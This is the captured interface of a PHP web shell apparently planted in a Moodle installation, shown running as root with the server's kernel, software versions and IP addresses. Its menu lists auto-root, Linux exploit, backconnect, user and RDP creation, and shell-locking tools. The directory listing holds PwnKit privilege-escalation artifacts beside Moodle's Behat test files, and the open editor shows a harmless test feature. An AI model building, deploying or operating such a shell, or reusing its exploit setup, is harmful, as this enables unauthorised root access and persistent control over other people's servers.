Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
form /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
fixtures
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
autocomplete.feature
3
KB
-rwxrwxrwx
behat_core_form.php
3.29
KB
-rwxrwxrwx
hideif.feature
1.17
KB
-rwxrwxrwx
modgrade_validation.feature
7.41
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
repeat_defaults.feature
1.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hideif.feature
@core @javascript @core_form Feature: hideIf functionality in forms For forms including hideIf functions As a user If I trigger the hideIf condition then the form elements will be hidden Background: Given the following "courses" exist: | fullname | shortname | | Course 1 | C1 | And I log in as "admin" And I am on "Course 1" course homepage And I turn editing mode on Scenario: When 'eq' hideIf conditions are not met, the relevant elements are shown When I add a "Assignment" to section "1" And I expand all fieldsets And I set the field "Students submit in groups" to "Yes" Then I should see "Require group to make submission" And I should see "Require all group members submit" And I should see "Grouping for student groups" Scenario: When 'eq' hideIf conditions are met, the relevant elements are hidden When I add a "Assignment" to section "1" And I expand all fieldsets And I set the field "Students submit in groups" to "No" Then I should not see "Require group to make submission" And I should not see "Require all group members to submit" And I should not see "Grouping for student groups"
Close